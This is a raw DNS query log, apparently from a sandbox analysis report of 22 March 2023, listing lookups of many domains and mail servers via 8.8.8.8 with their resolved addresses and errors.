                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.639838934 CET8.8.8.8192.168.2.50x10a8No error (0)www.pb-games.compb-games.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.639838934 CET8.8.8.8192.168.2.50x10a8No error (0)pb-games.com173.254.28.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.662786961 CET8.8.8.8192.168.2.50xa929No error (0)indonesiamedia.com74.208.215.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.736915112 CET8.8.8.8192.168.2.50xed42No error (0)revoldia.net45.200.235.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.796761990 CET8.8.8.8192.168.2.50x4143No error (0)likangds.com23.225.40.19A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.845670938 CET8.8.8.8192.168.2.50xc59aNo error (0)kumaden.com49.212.180.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.849539042 CET8.8.8.8192.168.2.50x80b3No error (0)nettlinx.org202.53.77.146A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:29.935694933 CET8.8.8.8192.168.2.50x40d2No error (0)techtrans.de185.237.66.112A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.066750050 CET8.8.8.8192.168.2.50xd4a2Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.097884893 CET8.8.8.8192.168.2.50x9675Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.121563911 CET8.8.8.8192.168.2.50x2f58No error (0)impexnc.com204.11.56.48A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.136809111 CET8.8.8.8192.168.2.50x5d57Server failure (2)canmore.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.163256884 CET8.8.8.8192.168.2.50x5ccName error (3)www.koz1.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.255119085 CET8.8.8.8192.168.2.50xa253No error (0)magicomm.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.289875031 CET8.8.8.8192.168.2.50x84b8No error (0)cpmteam.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.289875031 CET8.8.8.8192.168.2.50x84b8No error (0)cpmteam.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.351178885 CET8.8.8.8192.168.2.50xa192No error (0)coxkitchensandbaths.com205.149.134.32A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.484654903 CET8.8.8.8192.168.2.50x21caNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.623317003 CET8.8.8.8192.168.2.50x8cd1No error (0)fundeo.com104.24.160.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.623317003 CET8.8.8.8192.168.2.50x8cd1No error (0)fundeo.com172.67.97.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.623317003 CET8.8.8.8192.168.2.50x8cd1No error (0)fundeo.com104.24.161.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.638552904 CET8.8.8.8192.168.2.50x52a5No error (0)dayvo.com188.114.97.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.638552904 CET8.8.8.8192.168.2.50x52a5No error (0)dayvo.com188.114.96.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.666898966 CET8.8.8.8192.168.2.50xf4cNo error (0)nettle.pl195.128.140.29A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.673748016 CET8.8.8.8192.168.2.50xd648No error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.781253099 CET8.8.8.8192.168.2.50x2ed1No error (0)xult.org65.52.128.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.797691107 CET8.8.8.8192.168.2.50xe865No error (0)com-edit.fr63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.843298912 CET8.8.8.8192.168.2.50x4a9No error (0)www.sclover3.com157.112.182.239A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:30.899976015 CET8.8.8.8192.168.2.50x1e90No error (0)portoccd.org51.89.6.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.098015070 CET8.8.8.8192.168.2.50x5148No error (0)zupraha.cz77.78.104.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.181318998 CET8.8.8.8192.168.2.50x7f43No error (0)pers.com192.124.249.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.241065025 CET8.8.8.8192.168.2.50xa90cNo error (0)cnti.krsn.ru217.74.161.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.420407057 CET8.8.8.8192.168.2.50x8ce0Name error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.479664087 CET8.8.8.8192.168.2.50xb348No error (0)vdoherty.com91.216.241.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.501240015 CET8.8.8.8192.168.2.50xd35dName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.555433035 CET8.8.8.8192.168.2.50x7e60No error (0)skgm.ru91.201.52.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.573681116 CET8.8.8.8192.168.2.50xe10aName error (3)amba-tc.sinonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.582078934 CET8.8.8.8192.168.2.50x8583No error (0)a-domani.com183.90.232.24A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.599215031 CET8.8.8.8192.168.2.50x1280Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.662765980 CET8.8.8.8192.168.2.50xe0c4No error (0)karmy.com.pl185.253.212.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.690045118 CET8.8.8.8192.168.2.50xfebeNo error (0)any-s.net108.170.12.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.719274044 CET8.8.8.8192.168.2.50x5721No error (0)wantapc.net157.7.107.49A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.756268024 CET8.8.8.8192.168.2.50xea50Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.843274117 CET8.8.8.8192.168.2.50xda7fNo error (0)riwn.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.843274117 CET8.8.8.8192.168.2.50xda7fNo error (0)riwn.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.843274117 CET8.8.8.8192.168.2.50xda7fNo error (0)riwn.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.843274117 CET8.8.8.8192.168.2.50xda7fNo error (0)riwn.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.902112961 CET8.8.8.8192.168.2.50xea50Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:31.909065008 CET8.8.8.8192.168.2.50xce1No error (0)revoldia.net45.200.235.135A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.073750019 CET8.8.8.8192.168.2.50xc731No error (0)gmail-smtp-in.l.google.com142.251.31.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.461164951 CET8.8.8.8192.168.2.50xbc20No error (0)reproar.com194.143.194.23A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.537050009 CET8.8.8.8192.168.2.50x8843No error (0)btsi.com.ph69.46.30.77A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.553020000 CET8.8.8.8192.168.2.50x7170No error (0)nekono.net202.172.28.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.621401072 CET8.8.8.8192.168.2.50x97bdNo error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.642858982 CET8.8.8.8192.168.2.50x1280Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.662056923 CET8.8.8.8192.168.2.50xea50Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.814896107 CET8.8.8.8192.168.2.50x5c46No error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.814896107 CET8.8.8.8192.168.2.50x5c46No error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:32.925211906 CET8.8.8.8192.168.2.50xcc62No error (0)peminet.net198.54.117.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:33.464111090 CET8.8.8.8192.168.2.50xb289Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:33.642344952 CET8.8.8.8192.168.2.50xf345No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:33.676193953 CET8.8.8.8192.168.2.50x1280Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:34.731363058 CET8.8.8.8192.168.2.50x6f24Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.211847067 CET8.8.8.8192.168.2.50x806aNo error (0)paraski.org94.130.164.242A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.274087906 CET8.8.8.8192.168.2.50x6680No error (0)holp-ai.com59.106.13.169A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.378025055 CET8.8.8.8192.168.2.50xe769Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.420788050 CET8.8.8.8192.168.2.50xc137No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.420788050 CET8.8.8.8192.168.2.50xc137No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.420788050 CET8.8.8.8192.168.2.50xc137No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.420788050 CET8.8.8.8192.168.2.50xc137No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.432151079 CET8.8.8.8192.168.2.50x3617No error (0)wnit.org38.111.255.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.478143930 CET8.8.8.8192.168.2.50x8df4Name error (3)ktenergo.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.501346111 CET8.8.8.8192.168.2.50x6b9fNo error (0)acraloc.com192.64.150.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.593616962 CET8.8.8.8192.168.2.50x5c46No error (0)hyab.com104.21.65.224A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.593616962 CET8.8.8.8192.168.2.50x5c46No error (0)hyab.com172.67.193.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.669668913 CET8.8.8.8192.168.2.50x5347No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.697108030 CET8.8.8.8192.168.2.50x3ccbNo error (0)rokoron.com211.13.204.3A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.723352909 CET8.8.8.8192.168.2.50x1280Server failure (2)actmin.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.723968029 CET8.8.8.8192.168.2.50x7467No error (0)cqdgroup.com221.132.33.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:35.966620922 CET8.8.8.8192.168.2.50x6f24Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.177242994 CET8.8.8.8192.168.2.50xbdecNo error (0)snf.it95.174.22.233A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.273607016 CET8.8.8.8192.168.2.50x4875No error (0)sidepath.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.273607016 CET8.8.8.8192.168.2.50x4875No error (0)sidepath.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.273607016 CET8.8.8.8192.168.2.50x4875No error (0)sidepath.com34.193.69.252A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.273607016 CET8.8.8.8192.168.2.50x4875No error (0)sidepath.com34.193.204.92A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.559645891 CET8.8.8.8192.168.2.50x4d77Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.568732023 CET8.8.8.8192.168.2.50x7f01No error (0)dataform.co.uk83.223.113.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.585459948 CET8.8.8.8192.168.2.50xb17cName error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.599534035 CET8.8.8.8192.168.2.50x4ea0No error (0)smtp.mail.yahoo.comsmtp.mail.global.gm0.yahoodns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.599534035 CET8.8.8.8192.168.2.50x4ea0No error (0)smtp.mail.global.gm0.yahoodns.net87.248.97.36A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.622483015 CET8.8.8.8192.168.2.50x8606No error (0)oh28ya.com18.176.155.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.622483015 CET8.8.8.8192.168.2.50x8606No error (0)oh28ya.com54.248.94.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.809571028 CET8.8.8.8192.168.2.50x8221No error (0)dog-jog.net153.122.24.177A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.834404945 CET8.8.8.8192.168.2.50x176bNo error (0)wanoa.com164.90.244.158A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.834404945 CET8.8.8.8192.168.2.50x176bNo error (0)wanoa.com159.89.244.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:36.874804020 CET8.8.8.8192.168.2.50x6af2No error (0)ossir.org51.159.3.117A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.089302063 CET8.8.8.8192.168.2.50x39a9No error (0)www.fnw.usfnw.usCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.089302063 CET8.8.8.8192.168.2.50x39a9No error (0)fnw.us137.118.26.67A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.105526924 CET8.8.8.8192.168.2.50xb130No error (0)sokuwan.net185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.105526924 CET8.8.8.8192.168.2.50xb130No error (0)sokuwan.net185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.105526924 CET8.8.8.8192.168.2.50xb130No error (0)sokuwan.net185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.105623960 CET8.8.8.8192.168.2.50x60f1Server failure (2)www.ftchat.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.127569914 CET8.8.8.8192.168.2.50xb7c9No error (0)www.wnsavoy.com96.91.204.114A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.178375959 CET8.8.8.8192.168.2.50x57b5Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.342396021 CET8.8.8.8192.168.2.50xbbecNo error (0)gujarat.com172.67.145.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.342396021 CET8.8.8.8192.168.2.50xbbecNo error (0)gujarat.com104.21.73.143A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.596277952 CET8.8.8.8192.168.2.50x95d1No error (0)anduran.comtraff-1.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.596277952 CET8.8.8.8192.168.2.50x95d1No error (0)traff-1.hugedomains.comhdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.596277952 CET8.8.8.8192.168.2.50x95d1No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com54.209.32.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.596277952 CET8.8.8.8192.168.2.50x95d1No error (0)hdr-nlb9-41371129e8304c29.elb.us-east-1.amazonaws.com52.71.57.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.643374920 CET8.8.8.8192.168.2.50x8bfbNo error (0)komie.com59.106.13.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.649332047 CET8.8.8.8192.168.2.50xf911Name error (3)www.wkhk.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.671360016 CET8.8.8.8192.168.2.50x6f24Server failure (2)webband.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.760909081 CET8.8.8.8192.168.2.50xa51fNo error (0)vivastay.comtraff-4.hugedomains.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.760909081 CET8.8.8.8192.168.2.50xa51fNo error (0)traff-4.hugedomains.comhdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.760909081 CET8.8.8.8192.168.2.50xa51fNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com52.86.6.113A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.760909081 CET8.8.8.8192.168.2.50xa51fNo error (0)hdr-nlb8-39c51fa8696874ee.elb.us-east-1.amazonaws.com3.94.41.167A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.835251093 CET8.8.8.8192.168.2.50x26d3Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:37.925970078 CET8.8.8.8192.168.2.50x3709Server failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.001939058 CET8.8.8.8192.168.2.50x8f2eServer failure (2)atis-sk.canonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.183520079 CET8.8.8.8192.168.2.50x2583No error (0)fr-dat.com127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.464062929 CET8.8.8.8192.168.2.50x7edeNo error (0)kustnara.com75.2.70.75A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.464062929 CET8.8.8.8192.168.2.50x7edeNo error (0)kustnara.com76.223.27.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.464062929 CET8.8.8.8192.168.2.50x7edeNo error (0)kustnara.com13.248.155.104A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.464062929 CET8.8.8.8192.168.2.50x7edeNo error (0)kustnara.com99.83.190.102A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.542938948 CET8.8.8.8192.168.2.50xbc16No error (0)cbras.com54.39.198.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.581756115 CET8.8.8.8192.168.2.50x7673No error (0)4locals.net80.82.115.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.640336037 CET8.8.8.8192.168.2.50x3646No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.693753004 CET8.8.8.8192.168.2.50x359cNo error (0)geecl.com213.175.217.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:38.785787106 CET8.8.8.8192.168.2.50xc097No error (0)softizer.com185.163.45.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.014467001 CET8.8.8.8192.168.2.50xa0a1No error (0)tbvlugus.nl174.129.25.170A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.187329054 CET8.8.8.8192.168.2.50x50fbNo error (0)gphpedit.org127.0.0.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.504448891 CET8.8.8.8192.168.2.50x454aNo error (0)shanks.co.uk217.19.254.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.512324095 CET8.8.8.8192.168.2.50xfb05No error (0)noblesse.be5.134.4.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.527343988 CET8.8.8.8192.168.2.50xf7e5No error (0)t-trust.jp183.181.82.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.539700031 CET8.8.8.8192.168.2.50xb019No error (0)yhsll.com154.88.50.199A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.560117006 CET8.8.8.8192.168.2.50xd3b4No error (0)cyclad.pl87.98.236.253A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.592194080 CET8.8.8.8192.168.2.50x542dNo error (0)kewlmail.com63.251.106.25A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.643582106 CET8.8.8.8192.168.2.50xe241No error (0)scintel.com23.239.201.14A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.673084021 CET8.8.8.8192.168.2.50x1900No error (0)aluminox.es37.59.243.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.776957989 CET8.8.8.8192.168.2.50x653dNo error (0)juso-gr.ch172.67.163.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.776957989 CET8.8.8.8192.168.2.50x653dNo error (0)juso-gr.ch104.21.50.140A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:39.842111111 CET8.8.8.8192.168.2.50x4c89No error (0)ntc.edu.au192.124.249.15A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.318974018 CET8.8.8.8192.168.2.50x4804Name error (3)chzko.runonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.359167099 CET8.8.8.8192.168.2.50x33a6No error (0)floopis.com3.64.163.50A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.372363091 CET8.8.8.8192.168.2.50xe9b4Name error (3)toundo.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.381326914 CET8.8.8.8192.168.2.50x7f29No error (0)gbmfg.com151.101.2.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.381326914 CET8.8.8.8192.168.2.50x7f29No error (0)gbmfg.com151.101.66.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.381326914 CET8.8.8.8192.168.2.50x7f29No error (0)gbmfg.com151.101.130.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.381326914 CET8.8.8.8192.168.2.50x7f29No error (0)gbmfg.com151.101.194.132A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.381767035 CET8.8.8.8192.168.2.50x751bNo error (0)vvsteknik.dk185.31.76.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.381823063 CET8.8.8.8192.168.2.50x994cNo error (0)refintl.org198.185.159.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.381823063 CET8.8.8.8192.168.2.50x994cNo error (0)refintl.org198.49.23.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.381823063 CET8.8.8.8192.168.2.50x994cNo error (0)refintl.org198.49.23.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.381823063 CET8.8.8.8192.168.2.50x994cNo error (0)refintl.org198.185.159.145A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.387852907 CET8.8.8.8192.168.2.50x4f07No error (0)beafin.com133.125.38.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.404824018 CET8.8.8.8192.168.2.50xc470No error (0)deckoviny.cz88.86.118.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                      Mar 22, 2023 05:44:40.412344933 CET8.8.8.8192.168.2.50x8aeeNo error (0)cjborden.com15.197.142.173A (IP address)IN (0x0001)false
